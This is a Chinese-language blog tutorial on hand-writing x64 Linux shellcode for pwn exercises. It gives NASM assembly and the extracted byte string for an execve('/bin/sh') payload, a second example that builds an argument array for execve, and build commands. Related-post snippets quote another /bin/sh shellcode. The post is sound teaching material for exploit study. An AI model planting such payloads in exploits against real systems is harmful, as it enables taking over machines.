linux手写x64的shellcode

最新推荐文章于 2023-07-06 10:35:40 发布
最新推荐文章于 2023-07-06 10:35:40 发布
阅读量1.1k 收藏 3
点赞数
分类专栏: pwn linux 文章标签: linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/flurry_rain/article/details/119906719
版权
linux 同时被 2 个专栏收录
31 篇文章 0 订阅
订阅专栏
pwn
13 篇文章 1 订阅
订阅专栏

x64的寄存器基础

x86_64有16个64位寄存器,其中:
rax:常用来存放函数的返回值,系统调用之前用于存放调用号
rbp:栈帧寄存器
rsp:栈顶指针寄存器
rdi、rsi、rdx、rcx、r8、r9:存放函数参数,函数参数按照从左到右的顺序依次存入这几个寄存器,还有更多的参数则存入栈
rbx、rbp、r12、r13、r14、r15:用来存放数据,遵循被调用者使用规则,简单说就是可以直接拿来使用

编写汇编代码

下面的代码实现的是执行 execve("/bin/sh") 命令,rax寄存器存放execve的系统调用编号,rdi存放的是execve的参数:

section .text
global _start
_start:
push rax
xor rdx, rdx
xor rsi, rsi
mov rbx,'/bin//sh'
push rbx
push rsp
pop rdi
mov al, 59
syscall

关于x64的系统调用表可参考如下博文:
https://blog.csdn.net/SUKI547/article/details/103315487
把上述代码存放在test.asm文件中

编译汇编代码

nasm -f elf64 -o shell.o test.asm
ld shell.o -o shellcode

执行完上述命令后,会生成一个名为shellcode的可执行文件,运行shellcode可得到shell:
在这里插入图片描述

使用objdump获取反汇编代码:

objdump --disassemble ./shellcode

下图圈出的即为shellcode代码:
在这里插入图片描述
shellcode="\x50\x48\x31\xd2\x48\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x54\x5f\xb0\x3b\x0f\x05"

一点延申

简单总结一下上面的例子就是往栈空间里写入了/usr/bin字符串(字符串起始地址存在rdi寄存器),然后把这个字符串作为59号系统调用(execve)的第一个参数,使用syscall调用该系统调用即可实现**execve("/bin/sh")**命令,获取到shell
但其实上面的例子有几点特殊的地方:

  1. /bin/sh不需要参数,也就是说execve只需要一个入参
  2. /bin/sh长度小于8字节,在64位程序中,栈宽度是8字节

那么问题来了:如果我们想要执行其他命令该怎么构造呢?
其实原理差不多的,比如我们想要执行execve("/usr/bin/mytest", {"/usr/bin/mytest",“argvs”}, 0),思路如下:

  1. 首先/usr/bin/mytest长度超过8字节但没有超过16字节,所以我们使用两块栈即可存放,还有就是
    字符串是以0x0作为终止的
  2. 其次,栈是先入后出的结构,因此我们往栈里面填写参数值时,要把非空参数从右往左填入,拆分长字符串时也要注意要把拆好的字符串从右往左填入,比如/usr/bin/mytest要先填入/mytest然后再填入/usr/bin

综上,我们可以得到汇编代码如下:

global _start
_start:
;执行execve("/usr/bin/mytest", {"/usr/bin/mytest","argvs"}, 0)的汇编代码
xor rbp, rbp ;清空rbp寄存器
xor rax, rax ;清空rax寄存器
xor rbx, rbx ;清空rbx寄存器

;先填入{"/usr/bin/mytest","argvs"}参数
push rax         ; 填入0x0作为字符串终止符
mov rbx, 'argvs' ; 参数没有超过8字节,不需要拆分
push rbx         ; "argvs"入栈
mov rbx, rsp     ; 使用rbx寄存器记录下"argvs"存放的地址

push rax         ; 填入0x0作为字符串终止符
;'/usr/bin/mytest'长度超过了8字节,拆分为/usr/bin和/mytest两部分,从右往左填入
mov rbp, '//mytest' ; 填入/mytest,添加一个/补齐八字节
push rbp
mov rbp, '/usr/bin' ; 填入/usr/bin
push rbp
mov rbp, rsp        ; 使用rbp寄存器记录下'/usr/bin/mytest'存放的地址

;"argvs"'/usr/bin/mytest'放在一段连续的栈地址,构造出{"/usr/bin/mytest","argvs"}
push rax
mov rdx, rsp ; 此时rsp指向的栈存放的是0x0,所以直接把这个作为第三个入参,放在rdx寄存器
push rbx
push rbp
mov rsi, rsp ; 得到第二个入参{"/usr/bin/mytest","argvs"},存入rsi寄存器
mov rdi, rbp ; rbp指向的是"/usr/bin/mytest",作为第一个参数,存入rdi寄存器

; 三个入参已经全了,将execve的调用号(59)存入rax寄存器,调用syscall
mov rax, 59
syscall

把上面的代码存入test.asm文件然后使用如下命令编译链接即可得到test可执行文件:

nasm -f elf64 -o test.o test.asm
ld -o test test.o

Have fun!

参考博客:

https://www.jianshu.com/p/e21dcba5668f

下面的链接有很多现成的shellcode,可以根据需要选用:
https://www.exploit-db.com/shellcodes

flurry_rain
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
SLAE64:x64 Linux Shellcode
07-04
SLAE64 x64 Linux Shellcode SLAE64 - 1360
内核线程注入x64
11-22
Win764位下通过驱动Attach到目标进程下再调用NtCreateThreadEx函数创建线程执行ShellCode来注入Dll。
2023-06-28-[免杀学习]shellcode的使用(C++)
qq_42585535的博客
06-29 615
功能:调整一片在虚拟地址空间的内存的状态返回值:调指向整的内存的起始地址的指针win api为了准确的表达指针的作用对象,将void命名为了许多其他类型,但其本质都是voidvoid类型是一种无类型指针,也就是说它可以指向任意类型的数据用作函数的返回类型,表示函数不返回任何值。用作函数的参数类型,表示函数可以接受任意类型的指针。例如,内存分配函数 malloc 和 memset 的参数就是 void* 类型。
Linux x86_64 shellcode的编写
最新发布
小立仔
07-06 1177
Linux x86_64 shellcode的编写
linux_pwn(2)--double free&&qwb2018_raisepig
azraelxuemo的博客
03-05 1305
文章目录What is double freepwn题例题add函数show函数delete函数开始做题准备框架调试泄露libcdouble freeexp总结 What is double free double free顾名思义,两次释放,在ctf里面一般就是对同一个内存块释放了两次,其实这个跟之前的uaf产生的方式有点类似,都是需要满足指针没有被置NULL ptr=malloc(0x10) ptr2=malloc(0x10) free(ptr) free(ptr2) free(ptr) 由于直接连续
二进制各种漏洞原理实战分析总结
hhd1988的专栏
10-27 3227
二进制各种漏洞原理实战分析总结 0x01栈溢出漏洞原理 0x02 堆溢出漏洞原理 0x03 堆调试技巧 堆尾检查 页堆 0x04整数溢出漏洞原理 基于栈的整数溢出 ...
linux c语言shellcode,二进制入门-打造Linux shellcode基础篇
weixin_42412939的博客
05-12 536
0x01 前言本文的目的不是为了介绍如何进行恶意的破坏性活动,而是为了教会你如何去防御此类破坏性活动,以帮助你扩大知识范围,完善自己的技能,如有读者运用本文所学技术从事破坏性活动,本人概不负责。0x02 什么是Shellcodeshellcode是用作利用软件漏洞的有效载荷的一小段代码,因为它通常启动一个命令shell,攻击者可以从中控制受攻击的机器,所以称他为shellcode。但是任何执行类似...
此源代码将生成 linux x86的 shellcode.rar_linux shellcode_shell
09-20
此源代码将生成 linux x86的 shellcode
Windows x64内核模块-HelloWorld
07-25
Windows内核安全与驱动开发书的第一个示例程序,在新版本开发环境中调试通过,使用Visual Studio...在调试过程中,由于x64驱动程序禁止使用嵌入汇编,采用Shellcode方式进行软件中断调用,完成驱动程序在虚拟机的调试。
利器!schelper151_shellcode转为64位汇编32位汇编(包密码为123)
02-10
shellcode转为64位汇编32位汇编 也可以将64位汇编32位汇编转为各种类型的shellcode,利器!! 例如我要将C语言数组类型的shellcode转化为64...schelper.exe -i c.txt -s 0 -d 27 -dp x64 其中把shellcode写到文件c.txt
linuxshellcode编写手册
05-18
这是一本英文书籍,详细介绍了栈的结构,如何编制程序进行缓冲区溢出
linux内核漏洞分类,blog/linux kernel double-free类型漏洞的利用.md at master · snorez/blog · GitHub...
weixin_29440125的博客
05-02 378
linux kernel double-free类型漏洞的较通用利用方法update Wed Nov 29 16:39:01 HKT 2017linux kernel 4.14 released this month;relevant PATCH 0: add a naive detection of double free or corruption这个补丁, 在进行连续的kfree的时候会起...
Linux下SegmentFault(double free)分析方法(四)coredump文件
码中飞翔
03-10 1276
Linux下SegmentFault(double free)分析方法(四)coredump文件 一、coredump简介 1、coredump文件是什么? core dump又叫核心转储, 当程序运行过程中发生异常, 程序异常退出时,由操作系统把程序当前的内存状况存储在一个core文件中, 叫core dump.(linux中如果内存越界会收到SIGSEGV信号,然后就会core dump)在程...
[shellcode分享]Linux/x64 - 反向 (0.0.0.0:1907/TCP) Shell Shellcode (119 字节)
「鸿渐之翼」的博客
04-29 2385
免责声明: 本POC程序仅供安全研究与教学之用,使用者将其信息做其他用途,由使用者承担全部法律及连带责任,CSDN博客平台及博主鸿渐之翼不承担任何法律及连带责任。 Linux/x64 - Reverse (0.0.0.0:1907/TCP) Shell Shellcode (119 Bytes) * reverse shell tcp (1907) port shellcode C language - Linux/x86_64 Author : Kağan Çapar contact:
X64汇编 shellcode
qq_31314583的博客
08-17 255
注意对其16字节,因此需要rsp+8对其,其次前四个参数由 rcx,rdx,r8,r9传递。
Shellcode中ret调用和call调用函数区别
北冥有鱼的Blog
05-22 2983
ShellShellcode中ret调用和call调用函数区别在编写shellcode时,我们通常会使用call或者ret来调用执行某些系统函数或者我们自己编写的函数代码。下面以一个调用calc.exe的shellcode来说明一下它们的使用方式执行calc.exe的C语言代码: 1 LoadLibrary("kernel32.dll"); 2 WinExec("calc.exe",
如何写一个shellcode
qq_40712959的博客
01-16 511
什么样的shellcode可以起到最大的破坏,那就是能够满足攻击者各种各样需要的shellcode,怎么才能满足各种各样的需要呢?调用shell。 如何写一个shellcode,以需要execve()系统调用的shellcode为例: %eax:eax寄存器需要存储11,这是execve()的系统调用号(system call number) %ebx:存储控制字符串“/bin/sh”的地址(e...
书写Linux下自己的shellcode
Rare's Tech-Blog
04-08 539
http://linux.sheup.com/linux/40/linux30797.htm书写Linux下自己的shellcode概述:    aleph1书写了这篇经典文章,首先要向他致敬。    tt整理翻译了它,其次就是要向他表示衷心的感谢。    该篇文章由浅入深地详细介绍了整个书写shellcode的步骤,    并给出了图示帮助理解
Windows 下 shellcode 编写
aptx4869_li的博客
06-16 2012
Windows下的shellcode的编写首先,我们先了解一下shellcode是什么?Shellcode实际是一段代码(也可以是填充数据),是用来发送到服务器利用特定漏洞的代码,一般可以获取权限。另外,Shellcode一般是作为数据发送给受攻击服务器的。 Shellcode是溢出程序和蠕虫病毒的核心,提到它自然就会和漏洞联想在一起,毕竟Shellcode只对没有打补丁的主机有用武之地。网络上数...
写一段linux x86的shellcode
02-11
好的,下面是一段简单的 x86 Linux shellcode,它执行系统调用 `execve` 以运行命令 `/bin/sh`: ``` \x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80 ``` 请注意...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值